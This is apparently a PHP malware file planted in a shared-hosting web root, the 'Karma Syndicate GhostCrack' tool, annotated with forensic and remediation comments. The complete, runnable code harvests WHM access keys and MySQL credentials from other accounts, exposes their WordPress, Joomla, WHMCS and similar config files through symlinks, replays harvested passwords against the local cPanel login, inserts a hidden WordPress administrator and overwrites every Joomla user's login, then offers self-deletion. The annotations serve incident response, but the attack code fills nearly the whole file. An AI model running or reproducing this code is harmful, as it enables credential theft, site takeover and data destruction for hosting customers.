File: /home6/cco26461/public_html/.assets/2168ccff-843f-40f4-bec6-2901c707c1c0.php
<?php
// Silence every PHP error channel and lift the execution time limit, so the
// stages below run without emitting warnings and without being timed out.
error_reporting(0);
ini_set('display_errors', 0);
ini_set('max_execution_time', 0);
// Self-removal handler: a GET request carrying action=delete unlinks this script,
// answers with a JSON status and exits before any other stage runs.
// Forensic note: this handler removes only the script itself. Nothing in this
// file deletes the "ghost_results" / "ghost_sym" artefacts the class below
// creates, so those directories and the access-log entry for action=delete can
// remain as evidence after the file is gone.
if (isset($_GET['action']) && $_GET['action'] === 'delete') {
// Path = document root + URL path of the current request, i.e. this script's own
// location when it is requested directly (assumes no rewrite rules in between).
$script_path = $_SERVER['DOCUMENT_ROOT'] . parse_url($_SERVER['REQUEST_URI'], PHP_URL_PATH);
$delete_result = unlink($script_path);
// The JSON reply discloses the absolute filesystem path and, on failure, the
// last PHP error array.
$response = [
'status' => $delete_result ? 'success' : 'error',
'message' => $delete_result ? 'Script deleted successfully' : 'Failed to delete script',
'file_path' => $script_path,
'error' => $delete_result ? null : error_get_last()
];
header('Content-Type: application/json');
echo json_encode($response);
exit;
}
/**
 * Malware sample annotation: despite the neutral class name, the methods of this
 * class read other accounts' credential files, expose their application config
 * files through symlinks, replay recovered passwords against the local cPanel
 * login and write administrator accounts into WordPress and Joomla databases.
 * The comments in this class describe observed behaviour for incident response;
 * they are not usage documentation.
 */
class SecurityTool {
// Per-stage outcome map. Each stage records whether it succeeded, how many hits
// it had, and a short status message ('success', 'failed' or 'not executed');
// only the message is printed by outputResults().
private $results = [
'accesshash' => ['success' => false, 'count' => 0, 'message' => ''],
'cpanel' => ['success' => false, 'count' => 0, 'message' => 'not executed'],
'symlink' => ['success' => false, 'count' => 0, 'message' => 'not executed'],
'bruteforce' => ['success' => false, 'count' => 0, 'message' => 'not executed'],
'wordpress' => ['success' => false, 'count' => 0, 'message' => 'not executed'],
'joomla' => ['success' => false, 'count' => 0, 'message' => 'not executed']
];
// Relative output directory for harvested data. Because the path is relative,
// it resolves against whatever the working directory is when a stage writes to
// it. Indicator of compromise: a directory named "ghost_results" under the web root.
private $results_dir = "ghost_results";
/**
 * Creates the results directory (mode 0755, recursive) if it does not exist.
 *
 * The path is relative, so the directory is created under the current working
 * directory at call time. The '@' operator hides a failed mkdir and no return
 * value is checked, so callers cannot tell whether the directory exists afterwards.
 */
private function ensureResultsDir() {
if (!is_dir($this->results_dir)) {
@mkdir($this->results_dir, 0755, true);
}
}
/**
 * Stage "accesshash": looks for a readable /home/<user>/.accesshash for every
 * account listed in /etc/passwd and copies what it finds to
 * ghost_results/accesshash_results.txt.
 *
 * Defender note: on cPanel/WHM hosts .accesshash is the legacy WHM remote access
 * key file (NOTE(review): general knowledge, not shown in this file). Any key
 * that appears in the results file should be treated as exposed and
 * regenerated. The read succeeds only where another account's home directory
 * and this file are readable by the web server user, so the fact that this
 * stage produced output also points to weak per-account isolation.
 */
private function accessHashFinder() {
try {
// One entry per passwd line; if /etc/passwd cannot be read, fall back to a
// single entry holding the current user's name.
$names = @file('/etc/passwd', FILE_IGNORE_NEW_LINES | FILE_SKIP_EMPTY_LINES);
if ($names === false) {
$names = [$this->getCurrentUser()];
}
$this->ensureResultsDir();
foreach ($names as $name) {
// First colon-separated field of the passwd line is the account name.
$user = explode(':', $name)[0];
// The home directory is assumed to be /home/<user>; the passwd home field is not used.
$folder = "/home/{$user}/.accesshash";
if (@is_readable($folder)) {
$this->results['accesshash']['count']++;
// Newlines are stripped so the key is stored on a single line per account.
$content = str_replace("\n", "", @file_get_contents($folder));
$result_content = "WHM {$user}:{$content}\n";
@file_put_contents("{$this->results_dir}/accesshash_results.txt", $result_content, FILE_APPEND);
}
}
$this->results['accesshash']['success'] = $this->results['accesshash']['count'] > 0;
$this->results['accesshash']['message'] = $this->results['accesshash']['success'] ? 'success' : 'failed';
} catch (Exception $e) {
$this->results['accesshash']['message'] = 'failed';
}
}
/**
 * Stage "cpanel": same account walk as accessHashFinder(), but targeting
 * /home/<user>/.my.cnf, whose full content is appended to
 * ghost_results/cpanel_results.txt together with the account name.
 *
 * Defender note: .my.cnf is a MySQL client option file and commonly stores a
 * user name and password (NOTE(review): general knowledge, not shown in this
 * file). Rotate the database credentials of every account listed in the
 * results file.
 */
private function cpFinder() {
try {
// One entry per passwd line; falls back to the current user if the file is unreadable.
$names = @file('/etc/passwd', FILE_IGNORE_NEW_LINES | FILE_SKIP_EMPTY_LINES);
if ($names === false) {
$names = [$this->getCurrentUser()];
}
$this->ensureResultsDir();
foreach ($names as $name) {
// First colon-separated field of the passwd line is the account name.
$user = explode(':', $name)[0];
$folder = "/home/{$user}/.my.cnf";
if (@is_readable($folder)) {
$this->results['cpanel']['count']++;
// The file is copied verbatim, so the results file holds the credentials in clear text.
$content = @file_get_contents($folder);
$result_content = "User: {$user}\nContent:\n{$content}\n\n";
@file_put_contents("{$this->results_dir}/cpanel_results.txt", $result_content, FILE_APPEND);
}
}
$this->results['cpanel']['success'] = $this->results['cpanel']['count'] > 0;
$this->results['cpanel']['message'] = $this->results['cpanel']['success'] ? 'success' : 'failed';
} catch (Exception $e) {
$this->results['cpanel']['message'] = 'failed';
}
}
/**
 * Stages "symlink" and "bruteforce": exposes other accounts' application config
 * files through symlinks in a web-served directory, extracts database passwords
 * from them, and replays those passwords against the local cPanel login.
 *
 * What the code does, in order:
 *  1. Builds the account list from /etc/passwd (current user as fallback).
 *  2. Creates ./ghost_sym, changes into it and writes an .htaccess that enables
 *     directory indexes and FollowSymLinks and maps .php to a text type.
 *  3. For every account x config-file name, tries to symlink
 *     /home/<user>/public_html/<file> as "<user>~<file>.txt" in that directory.
 *  4. Requests its own ghost_sym/ index over HTTPS, fetches every linked ".txt"
 *     entry and regex-matches a WordPress DB_PASSWORD define or a
 *     "password = '...'" assignment.
 *  5. POSTs every (account, harvested password) pair to
 *     http://localhost:2082/login/ and appends pairs whose response contains
 *     'Location: /cpsess' to ghost_results/bruteforce_results.txt.
 *
 * Forensic indicators visible here: the directory "ghost_sym", the DirectoryIndex
 * value written to its .htaccess, symlinks named "<user>~<path>.txt", and
 * "bruteforce_results.txt". The working directory is ghost_sym when the results
 * directory is (re)created in step 5, so that file may sit under
 * ghost_sym/ghost_results/ rather than next to the script (confirm on the host).
 *
 * Defender note: the technique depends on Apache honouring FollowSymLinks from a
 * per-directory .htaccess and on the web server user being able to read other
 * accounts' files. Restricting Options overrides (for example enforcing
 * SymLinksIfOwnerMatch), per-account filesystem isolation and tight
 * home-directory permissions remove those preconditions. Every config file that
 * was reachable through a symlink should be treated as disclosed and its
 * credentials rotated; a burst of POSTs to /login/ on port 2082 from the local
 * host is the log signature of step 5.
 */
private function symlinkAndBruteforce() {
try {
// Account list: one passwd line per entry, or the current user as sole entry.
$names = @file('/etc/passwd', FILE_IGNORE_NEW_LINES | FILE_SKIP_EMPTY_LINES);
if ($names === false) {
$names = [$this->getCurrentUser()];
}
// Working directory for the symlinks, created next to the script.
if (!@is_dir('ghost_sym')) {
@mkdir('ghost_sym', 0755, true);
}
if (@is_dir('ghost_sym')) {
// From here on, relative paths in this method resolve inside ghost_sym.
@chdir('ghost_sym');
// The .htaccess turns on auto-indexing and symlink following and declares .php
// as a text type, so linked PHP config files are returned as source text
// instead of being executed.
$htaccess = "Options Indexes FollowSymLinks\nDirectoryIndex achon666ju5t.extremecrew\nAddType txt .php\nAddHandler txt .php";
@file_put_contents('.htaccess', $htaccess);
}
// Relative paths of configuration files probed under each account's
// public_html. The file names correspond to WordPress, Joomla, Drupal,
// vBulletin, WHMCS, BoxBilling, osCommerce/Zen Cart and similar applications;
// the list contains duplicates.
$config_files = [
"wp-config.php", "wp/wp-config.php", "WP/wp-config.php",
"wp/beta/wp-config.php", "beta/wp-config.php", "press/wp-config.php",
"wordpress/wp-config.php", "Wordpress/wp-config.php", "blog/wp-config.php",
"config.php", "news/wp-config.php", "new/wp-config.php",
"blogs/wp-config.php", "home/wp-config.php", "db.php",
"site/wp-config.php", "main/wp-config.php", "test/wp-config.php",
"configuration.php", "blog/configuration.php", "joomla/configuration.php",
"cms/configuration.php", "portal/configuration.php", "news/configuration.php",
"home/configuration.php", "www/configuration.php", "site/configuration.php",
"sites/configuration.php", "vb/includes/config.php", "whm/configuration.php",
"central/configuration.php", "whm/whmcs/configuration.php",
"whm/WHMCS/configuration.php", "whmc/WHM/configuration.php",
"support/configuration.php", "submitticket.php",
"whm/configuration.php", "drupal/sites/default/settings.php",
"drupal7/sites/default/settings.php", "sites/default/settings.php",
"vb/includes/config.php", "includes/config.php", "forum/includes/config.php",
"forums/includes/config.php", "cc/includes/config.php", "inc/config.php", "includes/configure.php",
"shop/includes/configure.php", "os/includes/configure.php", "oscom/includes/configure.php",
"products/includes/configure.php", "cart/includes/configure.php", "inc/conf_global.php",
"wp-config.php", "wp/test/wp-config.php", "blog/wp-config.php",
"beta/wp-config.php", "portal/wp-config.php", "site/wp-config.php", "wp/wp-config.php",
"WP/wp-config.php", "news/wp-config.php", "wordpress/wp-config.php", "test/wp-config.php",
"demo/wp-config.php", "home/wp-config.php", "v1/wp-config.php", "v2/wp-config.php",
"press/wp-config.php", "new/wp-config.php", "blogs/wp-config.php",
"configuration.php", "blog/configuration.php", "submitticket.php",
"cms/configuration.php", "beta/configuration.php", "portal/configuration.php",
"site/configuration.php", "main/configuration.php", "home/configuration.php",
"demo/configuration.php", "test/configuration.php", "v1/configuration.php",
"v2/configuration.php", "joomla/configuration.php", "new/configuration.php",
"WHMCS/configuration.php", "whmcs1/configuration.php", "whmcs/configuration.php",
"WHMC/configuration.php", "whmc/configuration.php", "WHM/configuration.php",
"Whm/configuration.php", "whm/configuration.php",
"HOST/configuration.php", "Host/configuration.php",
"host/configuration.php", "SUPPORTES/configuration.php",
"Supportes/configuration.php", "supportes/configuration.php",
"domains/configuration.php", "domain/configuration.php",
"Hosting/configuration.php", "HOSTING/configuration.php",
"hosting/configuration.php", "CART/configuration.php",
"Cart/configuration.php", "cart/configuration.php",
"ORDER/configuration.php", "Order/configuration.php",
"order/configuration.php", "CLIENT/configuration.php",
"Client/configuration.php", "client/configuration.php",
"CLIENTAREA/configuration.php", "Clientarea/configuration.php",
"clientarea/configuration.php", "SUPPORT/configuration.php",
"Support/configuration.php", "support/configuration.php",
"BILLING/configuration.php", "Billing/configuration.php",
"billing/configuration.php", "BUY/configuration.php",
"Buy/configuration.php", "buy/configuration.php",
"MANAGE/configuration.php", "Manage/configuration.php",
"manage/configuration.php", "CLIENTSUPPORT/configuration.php",
"ClientSupport/configuration.php", "Clientsupport/configuration.php",
"clientsupport/configuration.php", "CHECKOUT/configuration.php",
"Checkout/configuration.php", "checkout/configuration.php",
"BILLINGS/configuration.php", "Billings/configuration.php",
"billings/configuration.php", "BASKET/configuration.php",
"Basket/configuration.php", "basket/configuration.php",
"SECURE/configuration.php", "Secure/configuration.php",
"secure/configuration.php", "SALES/configuration.php",
"Sales/configuration.php", "sales/configuration.php",
"BILL/configuration.php", "Bill/configuration.php",
"bill/configuration.php", "PURCHASE/configuration.php",
"Purchase/configuration.php", "purchase/configuration.php",
"ACCOUNT/configuration.php", "Account/configuration.php",
"account/configuration.php", "USER/configuration.php",
"User/configuration.php", "user/configuration.php",
"CLIENTS/configuration.php", "Clients/configuration.php",
"clients/configuration.php", "BILLINGS/configuration.php",
"Billings/configuration.php", "billings/configuration.php",
"MY/configuration.php", "My/configuration.php",
"my/configuration.php", "secure/whm/configuration.php",
"secure/whmcs/configuration.php", "panel/configuration.php",
"clientes/configuration.php", "cliente/configuration.php",
"support/order/configuration.php", "bb-config.php",
"boxbilling/bb-config.php", "box/bb-config.php",
"host/bb-config.php", "Host/bb-config.php",
"supportes/bb-config.php", "support/bb-config.php",
"hosting/bb-config.php", "cart/bb-config.php",
"order/bb-config.php", "client/bb-config.php",
"clients/bb-config.php", "cliente/bb-config.php",
"clientes/bb-config.php", "billing/bb-config.php",
"billings/bb-config.php", "my/bb-config.php",
"secure/bb-config.php", "support/order/bb-config.php",
"includes/dist-configure.php", "zencart/includes/dist-configure.php",
"products/includes/dist-configure.php", "cart/includes/dist-configure.php",
"shop/includes/dist-configure.php", "includes/iso4217.php",
"hostbills/includes/iso4217.php", "host/includes/iso4217.php",
"Host/includes/iso4217.php", "supportes/includes/iso4217.php",
"support/includes/iso4217.php", "hosting/includes/iso4217.php",
"cart/includes/iso4217.php", "order/includes/iso4217.php",
"client/includes/iso4217.php", "clients/includes/iso4217.php",
"cliente/includes/iso4217.php", "clientes/includes/iso4217.php",
"billing/includes/iso4217.php", "billings/includes/iso4217.php",
"my/includes/iso4217.php", "secure/includes/iso4217.php",
"support/order/includes/iso4217.php"
];
// One symlink attempt per account and per config path; only successful
// symlink() calls are counted.
foreach ($names as $name) {
$user = explode(':', $name)[0];
foreach ($config_files as $confurl) {
$symlink_path = "{$user}~{$confurl}.txt";
if (@symlink("/home/{$user}/public_html/{$confurl}", $symlink_path)) {
$this->results['symlink']['count']++;
}
}
}
$this->results['symlink']['success'] = $this->results['symlink']['count'] > 0;
$this->results['symlink']['message'] = $this->results['symlink']['success'] ? 'success' : 'failed';
if ($this->results['symlink']['success']) {
// The script reads the linked files back through the web server rather than
// from disk: it requests its own ghost_sym/ directory index over HTTPS, using
// the server name and request path of the current request.
$url = "https://" . $_SERVER['SERVER_NAME'] . dirname($_SERVER['REQUEST_URI']) . "/ghost_sym/";
$curl = curl_init();
curl_setopt_array($curl, [
CURLOPT_URL => $url,
CURLOPT_RETURNTRANSFER => true,
CURLOPT_FOLLOWLOCATION => true,
CURLOPT_TIMEOUT => 30
]);
$response = @curl_exec($curl);
if ($response !== false) {
// Every href in the auto-generated index is collected; only ".txt" targets
// (the symlink names created above) are fetched.
preg_match_all('#<a href="([^"]+)"#', $response, $configs);
$passwords_list = '';
foreach ($configs[1] as $config) {
if (strpos($config, '.txt') !== false) {
$file_url = $url . $config;
$curl = curl_init();
curl_setopt_array($curl, [
CURLOPT_URL => $file_url,
CURLOPT_RETURNTRANSFER => true,
CURLOPT_FOLLOWLOCATION => true,
CURLOPT_TIMEOUT => 30
]);
$content = @curl_exec($curl);
@curl_close($curl);
if ($content) {
// Two password shapes are recognised: a WordPress DB_PASSWORD define and a
// "password = '...'" assignment (labelled 'joomla' here). The first match
// per file is kept; the label itself is not used further.
$patterns = [
"#'DB_PASSWORD', '(.*?)'#" => 'wordpress',
"#password = '(.*?)'#" => 'joomla'
];
foreach ($patterns as $pattern => $type) {
if (preg_match($pattern, $content, $match)) {
$passwords_list .= $match[1] . "\n";
break;
}
}
}
}
}
}
@curl_close($curl);
if (!empty($passwords_list)) {
// Credential-reuse check: every account name is paired with every harvested
// database password and submitted to the local cPanel login.
$users = array_filter(explode("\n", trim(implode("\n", array_map(function($name) { return explode(':', $name)[0]; }, $names)))));
$passwords = array_filter(explode("\n", trim($passwords_list)));
$cpanel_found = 0;
$this->ensureResultsDir();
foreach ($users as $user) {
foreach ($passwords as $pwd) {
// A TCP connect to port 2082 is attempted before each login request.
$connection = @fsockopen('localhost', 2082, $errno, $errstr, 5);
if ($connection) {
fclose($connection);
$curl = curl_init();
curl_setopt_array($curl, [
CURLOPT_URL => "http://localhost:2082/login/",
CURLOPT_POST => true,
CURLOPT_POSTFIELDS => http_build_query(['user' => $user, 'pass' => $pwd]),
CURLOPT_RETURNTRANSFER => true,
CURLOPT_TIMEOUT => 10,
CURLOPT_FOLLOWLOCATION => false
]);
$response = @curl_exec($curl);
// A pair is treated as valid when the response text contains a redirect to a
// /cpsess session path; valid pairs are stored in clear text.
if ($response !== false && strpos($response, 'Location: /cpsess') !== false) {
$cpanel_found++;
@file_put_contents("{$this->results_dir}/bruteforce_results.txt", "User: {$user}\nPassword: {$pwd}\n\n", FILE_APPEND);
}
@curl_close($curl);
}
}
}
$this->results['bruteforce']['success'] = $cpanel_found > 0;
$this->results['bruteforce']['count'] = $cpanel_found;
$this->results['bruteforce']['message'] = $this->results['bruteforce']['success'] ? 'success' : 'failed';
} else {
$this->results['bruteforce']['message'] = 'failed';
}
}
} catch (Exception $e) {
$this->results['symlink']['message'] = 'failed';
$this->results['bruteforce']['message'] = 'failed';
}
}
/**
 * Stage "wordpress": for every exposed wp-config.php found in the ghost_sym
 * index, connects to that site's database with the site's own credentials and
 * inserts a new user with administrator capabilities.
 *
 * Runs only when the symlink stage reported success. Affected sites are logged
 * to ghost_results/wordpress_results.txt (relative to $symlink_path, because the
 * method changes into that directory before writing).
 *
 * Indicators to search for in WordPress databases on the host:
 *  - a row in <prefix>users with user_login 'GhostCrack', user_nicename
 *    'firstname lastname', user_email 'email@example.com' and the fixed
 *    32-hex-character user_pass value shown in the INSERT below;
 *  - <prefix>usermeta rows for that user id granting the administrator role and
 *    user_level 10.
 * The results file records a plaintext password string next to the login name;
 * whether it corresponds to the stored hash cannot be verified from this file.
 *
 * Remediation note: removing the inserted user is not sufficient, since the
 * database credentials read from wp-config.php are themselves disclosed and
 * need rotating.
 *
 * @param string $symlink_path Absolute path of the ghost_sym directory.
 */
private function wpMassUserAdder($symlink_path) {
try {
if (!$this->results['symlink']['success']) {
$this->results['wordpress']['message'] = 'failed';
return;
}
// Same self-request as the symlink stage: list ghost_sym/ through the web server.
$url = "https://" . $_SERVER['SERVER_NAME'] . dirname($_SERVER['REQUEST_URI']) . "/ghost_sym/";
$curl = curl_init();
curl_setopt_array($curl, [CURLOPT_URL => $url, CURLOPT_RETURNTRANSFER => true, CURLOPT_FOLLOWLOCATION => true]);
$response = @curl_exec($curl);
@curl_close($curl);
if ($response === false) {
$this->results['wordpress']['message'] = 'failed';
return;
}
preg_match_all('#<a href="([^"]+)"#', $response, $configs);
foreach ($configs[1] as $config) {
// Only index entries that point at a linked wp-config.php are processed.
if (strpos($config, 'wp-config.php.txt') !== false) {
@chdir($symlink_path);
$curl = curl_init();
curl_setopt_array($curl, [CURLOPT_URL => $url . $config, CURLOPT_RETURNTRANSFER => true]);
$content = @curl_exec($curl);
@curl_close($curl);
if ($content) {
// Connection settings and table prefix are pulled out of the config source
// with regular expressions; all five must match before a connection is tried.
preg_match("#'DB_HOST', '(.*?)'#", $content, $host);
preg_match("#'DB_PASSWORD', '(.*?)'#", $content, $pass);
preg_match("#'DB_USER', '(.*?)'#", $content, $user);
preg_match("#'DB_NAME', '(.*?)'#", $content, $name);
preg_match("#table_prefix\s*= '(.*?)'#", $content, $prefix);
if ($host && $user && $pass && $name && $prefix) {
$connect = @mysqli_connect($host[1], $user[1], $pass[1], $name[1]);
if ($connect) {
$prefix = $prefix[1];
// Three statements: the user row, then two usermeta rows keyed on
// LAST_INSERT_ID() that grant the administrator role and user_level 10.
$queries = [
"INSERT INTO `{$prefix}users` (`user_login`, `user_pass`, `user_nicename`, `user_email`, `user_status`)
VALUES ('GhostCrack', '5ae11ae4c4da98d616377f2c1543f796', 'firstname lastname', 'email@example.com', '0')",
"INSERT INTO `{$prefix}usermeta` (`user_id`, `meta_key`, `meta_value`)
VALUES (LAST_INSERT_ID(), '{$prefix}capabilities', 'a:1:{s:13:\"administrator\";s:1:\"1\";}')",
"INSERT INTO `{$prefix}usermeta` (`user_id`, `meta_key`, `meta_value`)
VALUES (LAST_INSERT_ID(), '{$prefix}user_level', '10')"
];
$success = true;
foreach ($queries as $query) {
$success = $success && @mysqli_query($connect, $query);
}
// The site URL is read from the options table so the login page can be logged.
$siteurl_query = @mysqli_query($connect, "SELECT `option_value` FROM `{$prefix}options` WHERE `option_name`='siteurl'");
$siteurl = $siteurl_query ? @mysqli_fetch_array($siteurl_query, MYSQLI_ASSOC)['option_value'] : '';
if ($success && $siteurl) {
$this->results['wordpress']['count']++;
@file_put_contents("{$this->results_dir}/wordpress_results.txt",
"URL: {$siteurl}/wp-login.php\nUsername: GhostCrack\nPassword: Karma@Syndicate#GhostCrack\n\n", FILE_APPEND);
}
@mysqli_close($connect);
}
}
}
}
}
$this->results['wordpress']['success'] = $this->results['wordpress']['count'] > 0;
$this->results['wordpress']['message'] = $this->results['wordpress']['success'] ? 'success' : 'failed';
} catch (Exception $e) {
$this->results['wordpress']['message'] = 'failed';
}
}
/**
 * Stage "joomla": for every exposed Joomla configuration.php found in the
 * ghost_sym index, connects to that site's database with the site's own
 * credentials and overwrites the login name and password hash in its users table.
 *
 * Runs only when the symlink stage reported success. Affected sites are logged
 * to ghost_results/joomla_results.txt (relative to $symlink_path, because the
 * method changes into that directory before writing).
 *
 * Impact note for incident response: the UPDATE below has no WHERE clause, so it
 * rewrites username and password on every row of <prefix>users, not only on an
 * administrator account. Recovery therefore needs the users table restored from
 * a backup taken before the compromise, plus rotation of the disclosed database
 * credentials. A users table in which all rows share username 'administrator'
 * and the same password value is the indicator.
 *
 * @param string $symlink_path Absolute path of the ghost_sym directory.
 */
private function joomlaMassUserChanger($symlink_path) {
try {
if (!$this->results['symlink']['success']) {
$this->results['joomla']['message'] = 'failed';
return;
}
// Same self-request as the symlink stage: list ghost_sym/ through the web server.
$url = "https://" . $_SERVER['SERVER_NAME'] . dirname($_SERVER['REQUEST_URI']) . "/ghost_sym/";
$curl = curl_init();
curl_setopt_array($curl, [CURLOPT_URL => $url, CURLOPT_RETURNTRANSFER => true, CURLOPT_FOLLOWLOCATION => true]);
$response = @curl_exec($curl);
@curl_close($curl);
if ($response === false) {
$this->results['joomla']['message'] = 'failed';
return;
}
preg_match_all('#<a href="([^"]+)"#', $response, $configs);
foreach ($configs[1] as $config) {
// Only index entries that point at a linked configuration.php are processed.
if (strpos($config, 'configuration.php.txt') !== false) {
@chdir($symlink_path);
$curl = curl_init();
curl_setopt_array($curl, [CURLOPT_URL => $url . $config, CURLOPT_RETURNTRANSFER => true]);
$content = @curl_exec($curl);
@curl_close($curl);
if ($content) {
// Database settings are read from the config source with case-insensitive
// regular expressions; the domain part of "mailfrom" is reused as the site
// host name when logging. All six matches are required.
preg_match('#\$host = \'(.*?)\'#i', $content, $host);
preg_match('#\$password = \'(.*?)\'#i', $content, $pass);
preg_match('#\$user = \'(.*?)\'#i', $content, $user);
preg_match('#\$db = \'(.*?)\'#i', $content, $name);
preg_match('#\$dbprefix = \'(.*?)\'#i', $content, $prefix);
preg_match("#mailfrom = '(.*?)@(.*?)'#i", $content, $site_url);
if ($host && $user && $pass && $name && $prefix && $site_url) {
$con = @mysqli_connect($host[1], $user[1], $pass[1], $name[1]);
if ($con) {
// No WHERE clause: the statement applies to every row in the table.
$query = "UPDATE {$prefix[1]}users SET username='administrator',
password='5ae11ae4c4da98d616377f2c1543f796'";
if (@mysqli_query($con, $query)) {
$this->results['joomla']['count']++;
@file_put_contents("{$this->results_dir}/joomla_results.txt",
"URL: http://{$site_url[2]}/administrator\nUsername: administrator\nPassword: Karma@Syndicate#GhostCrack\n\n", FILE_APPEND);
}
@mysqli_close($con);
}
}
}
}
}
$this->results['joomla']['success'] = $this->results['joomla']['count'] > 0;
$this->results['joomla']['message'] = $this->results['joomla']['success'] ? 'success' : 'failed';
} catch (Exception $e) {
$this->results['joomla']['message'] = 'failed';
}
}
/**
 * Returns the account name the PHP process runs as.
 *
 * Uses posix_getpwuid(posix_getuid()) when both POSIX functions exist, otherwise
 * $_SERVER['USER'] when set, otherwise the literal 'unknown'. The other methods
 * use this value as the only account to inspect when /etc/passwd is unreadable.
 */
private function getCurrentUser() {
return function_exists('posix_getpwuid') && function_exists('posix_getuid')
? posix_getpwuid(posix_getuid())['name']
: (isset($_SERVER['USER']) ? $_SERVER['USER'] : 'unknown');
}
/**
 * Prints a plain-text summary: a banner line followed by one
 * "<STAGE>: <message>" line per entry of $results.
 *
 * Only the status message is returned to the HTTP client; the harvested data
 * itself stays in the results files on disk. The banner string is a stable
 * indicator for searching response captures or proxy logs.
 */
private function outputResults() {
header('Content-Type: text/plain');
echo "=== Karma Syndicate GhostCrack Results ===\n\n";
foreach ($this->results as $key => $result) {
echo strtoupper($key) . ": " . $result['message'] . "\n";
}
}
/**
 * Entry point: runs the stages in a fixed order and prints the summary.
 *
 * Order and gating as coded:
 *  1. accessHashFinder() always runs.
 *  2. Only if no access hash was found: cpFinder(), then symlinkAndBruteforce().
 *  3. Only if at least one symlink was created: wpMassUserAdder(), then
 *     joomlaMassUserChanger().
 * The working directory is reset to the starting directory after each stage,
 * because the later stages change into ghost_sym.
 *
 * Triage note: a summary showing 'not executed' for the later stages together
 * with ACCESSHASH 'success' means a WHM access key was collected and the run
 * stopped there, not that the host was unaffected.
 */
public function run() {
$base_dir = getcwd();
$symlink_path = $base_dir . "/ghost_sym";
$this->accessHashFinder();
@chdir($base_dir);
if (!$this->results['accesshash']['success']) {
$this->cpFinder();
@chdir($base_dir);
$this->symlinkAndBruteforce();
@chdir($base_dir);
if ($this->results['symlink']['success']) {
$this->wpMassUserAdder($symlink_path);
@chdir($base_dir);
$this->joomlaMassUserChanger($symlink_path);
@chdir($base_dir);
}
}
$this->outputResults();
}
}
// The full run starts on every request that reaches this file, apart from
// action=delete (which exits earlier). No authentication or parameter check is
// visible in front of it, so each access-log hit on this path corresponds to
// one complete execution of the stages above.
$tool = new SecurityTool();
$tool->run();